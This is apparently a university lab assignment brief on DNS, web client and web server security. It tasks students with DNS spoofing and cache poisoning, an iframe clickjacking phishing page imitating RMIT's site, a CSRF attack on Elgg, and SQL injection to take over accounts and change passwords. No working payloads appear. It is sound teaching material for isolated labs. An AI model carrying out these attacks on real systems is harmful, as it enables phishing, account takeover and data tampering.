Reference no: EM134013358

IT Infrastructure and Security

Overview

The objective of Assignment 2 is to evaluate your knowledge on the topics covered by Lecture 1-11. You are required to prepare the solutions (recording if required, and reports with screenshots + explanations). Then upload them as a single ZIP to CANVAS.

Learning outcome 1: Describe all of the IT Infrastructure Architecture components and the issues relating to each of them.

Learning outcome 2: Demonstrate knowledge of higher level aspects of data communication and networking appropriate for the development of software applications in a networked environment and design simple computer scripts that are aware of basic aspects of networking.

Learning outcome 3: Analyse and determine an appropriate enterprise networking systems and secure web server configuration based on stated user needs.

Learning outcome 4: Describe and review emerging networking and security technologies within the broader field of information technology and system environments.

Section 1: Exploring Domain Name Services (DNS) and its Security

DNS (Domain Name System) is the Internet's phone book; it translates hostnames to IP addresses (and vice versa). This translation is through DNS resolution, which happens behind the scene. DNS attacks manipulate this resolution process in various ways, with an intent to misdirect users to alternative destinations, which are often malicious. Suppose Figure1 depicts the environment of your company's network, which comprises four separate machines: one for the victim, one for the local DNS server, and two for the attacker.

Assume you are configuring your company network's DNS services. Please implement the following DNS service testing cases in the following sub-questions to test your company network's DNS services' functionality and security. Use the Lab 7's Labsetup files to construct the network.

Write a report for the following sub-questions with screenshots and explanations, as well as a video recording to demonstrate.

Tips-1: Use the command $ docker system prune -a -f when encountering the error "Cannot create the container for service attacker: Conflict. ... container name .. is already in use".

Tips-2: IP_1 is defined by the last four digits of your student No. Suppose your student No. is ‘s3123456', then the IP_1 is ‘3.4.5.6' Demonstrate your protection succeeds and briefly describe your protection.

Tips-3: You may consider the demonstration in Week 6's Lecture and Week7's Tutorial as an example.

Q1.1 Write Linux commands to find out the IP address of www.example.com. Please walkthrough the entire DNS lookup in a recursive way. Please use the IP address of root name server "a.root-servers.net" to perform the first layer DNS lookup.

Q1.2 Based on your screenshots of DNS lookup in Q1.1, please explain the DNS response packets.

Q1.4 When a user types the name of a web site (a host name, such as www.example.com) in a web browser, the user's computer will send a DNS request to the local DNS server to resolve the IP address of the host name. Attackers can sniff the DNS request message, they can then immediately create a fake DNS response, and send back to the user machine.

Please write a program to launch such an attack. A code skeleton is provided in the following dns-spoof-1.py. The fake IP address should be IP_1. Demonstrate your attack has been successfully launched.

Q1.5 When a local DNS server receives a query, it first looks for the answer from its own cache; if the answer is there, the DNS server will simply reply with the information from its cache. If the answer is not in the cache, the DNS server will try to get the answer from other DNS servers. When it gets the answer, it will store the answer in the cache, so next time, there is no need to ask other DNS servers.

Please modify the program dns-spoof-1.py used in the previous task Q1.4 for this DNS cache poisoning attack. Attackers will spoof the response (fake IP_1 for www.example.com) from other DNS servers, the local DNS server will keep the spoofed response in its cache for certain period of time. Next time, when a user's machine wants to resolve the same host name, it will get the spoofed response from the cache. Demonstrate your attack has been successfully launched. Before attacking, make sure that the DNS Server's cache is empty using Linux command $ rndc flush.

Section 2: Web Client and Security

The client side of web infrastructure interacts with users directly. It is vulnerable to various types of attacks, such as phishing attacks and cross-site scripting attacks. This section involves a victim user, a trusted site (www.seed-server.com), and a malicious site. Students will be attacking a social networking web application using the CSRF attack. The website's Docker is based on Lab 8's Labsetup. In order to perform this attack, students first need to create a phishing website using the provided RMIT.zip.

Understanding secure web applications often requires knowledge of database management DBMS concepts and client-server interactions.

Figure Elgg Website
We have created several user accounts on the Elgg server; the user name and passwords are given in the following.

Write a report for the following sub-questions with screenshots and explanations, as well as a video recording to demonstrate.

Tips-1: Use the command $ docker system prune -a -f when encountering the error "?Cannot create the container for service attacker: Conflict. ... container name .. is already in use".

Q2.1 Create a phishing website "?https://www.attacker32.com/" using iFrame that emulates RMIT's homepage, but contains an invisible malicious button on top of "Courses" link, as shown in the following Figure 3. Once the victim user clicks the "Malicious button", the webpage is redirected to "?https://www.attacker32.com/addfriend.html" page. The "Malicious button" should be displayed with your student number as "Malicious button s31234567".
Tips-1: Students can put the unzipped RMIT.zip website into "attacker" folder in Labsetup.
Tips-2: Students can modify the "attacker/index.html" to make it as a phishing website.
Tips-3: Students can use $ sudo chmod -R 4777 .. command to grant full access to RMIT website if you encounter 403 forbidden error.

Q2.2 Modify the phishing website in Q2.1 to make the "Malicious button" and iFrame invisible. Students can modify the CSS style of HTML button tag and iframe tag.

Q2.3 Now we need two people in the Elgg social network: Boby and Samy. Samy wants to become a friend to Boby, but Boby refuses to add him to her Elgg friend list. Samy decides to use the CSRF attack to achieve his goal. He sends Boby an URL (via an email or a posting in Elgg); Boby, curious about it, clicks on the URL, which leads her to Samy's web site: www.attacker32.com.

Pretend that you are Samy, demonstrate how you can construct the content of the web page, so as soon as Boby visits the web page, Samy is added to the friend list of Boby (assuming Boby has an active session with Elgg).

Section 3: Web Server and Security

SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web applications and database servers. In this section, we have created a web application given in the Lab 9's Labsetup Docker, which is vulnerable to the SQL injection attack.

Assume you are an attacker who attempts to exploit the web application without knowing any user's password. Please conduct the following SQL injection attacks in the following sub-questions.

Write a report for the following sub-questions with screenshots and explanations, as well as a video recording to demonstrate.

Q3.1 In the above SQL statement, the variable $input_uname holds the string typed in the Username textbox, and $hashed_pwd holds the string typed in the Password textbox. User's inputs in these two textboxes are placed directly in the SQL query string. There is a SQL-injection vulnerability in the above SELECT query. Exploit the vulnerability and log into Ted's account without knowing the correct password. Demonstrate that your attack succeeds and explain your attack based on your exploited SQL.

You also need to make an unauthorised modification to the database. Your goal is to modify another user's profile using SQL injections. In this web application, if users want to update their profiles, they can click the Edit Profile link on the navigation bar, and then fill out a form to update the profile information.

Q3.2 In above sub-question Q3.1, you have exploited the web application and logged in as Ted. Exploiting the vulnerability in this UPDATE SQL statement by using Ted's account to modify Boby's nickname to your student name, email to your RMIT student email, and address to "RMIT", without knowing Ted's password and Boby's password. Demonstrate that your attack succeeds and explain your attack based on your exploited SQL.

Q3.3 In above sub-question Q3.1, you have exploited the web application and logged in as Ted. Exploiting the vulnerability in this UPDATE SQL statement by using Ted's account to modify Boby's password to PWD_1 without knowing Ted's password and Boby's password. Note that the password is protected using SHA1 in this application. You can use the online tool to compute hash. Demonstrate that your attack succeeds and explain your attack based on your exploited SQL.